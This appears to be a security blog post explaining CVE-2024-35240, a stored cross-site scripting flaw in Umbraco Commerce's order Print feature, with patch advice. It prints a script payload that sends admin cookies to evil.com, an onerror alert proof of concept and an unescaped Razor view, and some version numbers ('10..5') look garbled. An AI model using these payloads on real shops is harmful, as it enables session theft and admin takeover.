Umbraco Commerce is a powerful, open-source .NET e-commerce platform used by many websites to handle online sales and order management. Recently, a severe security vulnerability (CVE-2024-35240) was uncovered in several versions of Umbraco Commerce. This flaw, affecting the Print functionality, allows attackers to inject persistent (stored) cross-site scripting (XSS) payloads. Left unpatched, it could enable attackers to execute malicious JavaScript in the browsers of admins or users who access tainted order print pages.

In this post, we'll break down how CVE-2024-35240 works, provide an exploit example, and share the official fix and useful references. This is an exclusive, easy-to-follow guide to help you understand and protect your Umbraco Commerce installations.

What is CVE-2024-35240?

CVE-2024-35240 is a critical vulnerability in Umbraco Commerce versions prior to 12.1.4 and 10..5. The flaw is a stored XSS (Cross-site Scripting) vulnerability in the Print functionality. An attacker can inject malicious scripts into certain input fields (such as order notes) that are later rendered unsanitized in order printouts.

Exploit Scenario: How Could an Attacker Take Advantage?

Suppose an e-commerce site is running a vulnerable version of Umbraco Commerce. Here’s a basic attack flow:

1. Attacker submits an order with a malicious JavaScript payload in a field (like Order Notes or a custom text field).
2. When an admin or staff member prints the order, the malicious payload gets executed in their browser.
3. The attacker can now steal session cookies, perform actions on behalf of the admin, or pivot further.

Step 1: Attacker injects this code in the "Order Notes" field during checkout

<script>
  // Steal cookie and send to attacker's server
  fetch('https://evil.com/steal?c='; + document.cookie);
</script>

Step 2: Admin goes to print the order.

The Print function retrieves and renders the order notes without escaping HTML, so the payload runs.

Result

The admin's browser executes the attacker's script. The session cookie (or any other sensitive data accessible via JS) is stolen and sent to evil.com.

Why Is This So Dangerous?

- Persistence: The XSS is stored in the database and triggered each time someone views or prints the order.
- Privilege Escalation: If the admin user is targeted, attackers may compromise the entire e-commerce backend.

How Was This Fixed?

Umbraco Commerce 12.1.4 and 10..5 patch this issue by properly encoding/sanitizing user input before rendering it in printable documents. If you’re using an affected version, an upgrade is the only way to protect yourself and your users.

Patch Notes & References

- GitHub Security Advisory
- Umbraco Commerce Release Notes
- NVD Entry for CVE-2024-35240 (may be updated further)

Upgrade Immediately: Update to Umbraco Commerce 12.1.4, 10..5, or later.

2. Review Logs: Check for suspicious input (such as <script> tags) in order notes or custom fields.
3. Educate Staff: Warn admins and support staff against printing or opening unusual orders if you are not yet patched.

Full Proof-of-Concept (PoC) Exploit

Note: This is for security education only. DO NOT use this attack on systems you don’t own or have permission to test.

Suppose the order note is stored in the database as-is and displayed directly on the /print endpoint.

Injected Order Notes

<img src="x" onerror="alert('XSS');">

Affected Razor View Example (before patch)

<!-- BAD: Order.Notes is rendered unsanitized -->
<div class="order-notes">@Model.Order.Notes</div>

Patched Razor View Example (after patch)

<!-- GOOD: Order.Notes is HTML-encoded -->
<div class="order-notes">@Html.Encode(Model.Order.Notes)</div>

Conclusion

CVE-2024-35240 is a textbook example of why output encoding is critical, especially when handling user input. Anyone running Umbraco Commerce should patch now. Don’t let your e-commerce business fall victim to this simple but nasty bug.

- Patch now: Official downloads
- Further reading: OWASP XSS

If you have more questions, feel free to follow the GitHub advisory or ask the Umbraco community for help.

Timeline

Published on: 05/28/2024 21:16:31 UTC
Last modified on: 05/29/2024 13:02:09 UTC